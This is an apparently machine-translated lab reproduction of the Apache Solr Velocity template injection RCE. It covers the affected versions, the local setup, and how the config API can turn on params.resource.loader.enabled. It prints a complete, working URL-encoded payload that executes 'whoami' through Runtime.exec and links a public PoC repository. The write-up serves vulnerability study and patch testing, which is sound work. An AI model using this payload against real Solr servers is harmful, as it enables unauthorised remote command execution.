Apache Solr Velocity template injection RCE vulnerability reproduction
A, Apache Solr introduction
Solr is a standalone enterprise search application servers, which provide external similar to the web-service API interface, users can submit certain format by http requests to the search engine server XML file, generate the index, you can also put forward by http get operation Find the request and returns the results obtained in XML format.
Second, Vulnerability Description
There is VelocityResponseWriter Solr component, an attacker can construct a specific request to modify configuration, the VelocityResponseWriter component allows to load the specified template, which led to Velocity templates injected remote command execution vulnerability, an attacker could exploit the vulnerability directly to the server permissions.
Vulnerability causes:
When the attacker can directly access Solr console, you can send a similar / node name / config POST request to do to change the default Apache Solr Integration VelocityResponseWriter plug the node configuration file, params.resource initialization parameters of the plug-in. loader.enabled this option is used to control whether to allow resource loader parameters specified in the parameter template, the default setting is false in Solr request. When set to params.resource.loader.enabled ture, it will allow users to specify the resources loaded through parameter setting request, which means that an attacker can request a threatening attack by constructing a command on the server carried out.
Third, the vulnerability affects version
Apache Solr 5.x - 8.2.0, there is config API version
Fourth, the vulnerability environment to build
1, install java environment
2. Download Apache Solr 8.2.0, Download: https://www.apache.org/dyn/closer.lua/lucene/solr/8.2.0/solr-8.2.0.zip
3, unpacked and then go to the bin directory execute solr.cmd start
4, browser access 192.168.10.171:8983, environment to build success
Five vulnerabilities reproduction
1, reboot, access again found no 192.168.10.171:8983/solr create core, first manually create a test folder in the / server / solr / directory, then the conf / server / solr / configsets / _default / under directory are copied to the test directory
2, and a core according to the following map creation named test shown
3, then visit to see if the application config files can be accessed
4, Apache Solr integrated VelocityResponseWriter default widget, the widget set params.resource.loader.enabled Default initialization parameter is false, but may be set by directly modifying the POST request is provided, which is set to true, then we can construct a special GET requests to remote code execution.
5, then we can construct payload to achieve RCE
Payload as follows:
/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end
-----------------------------------------------------------------------------------------------------
reference:
POC Address: https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template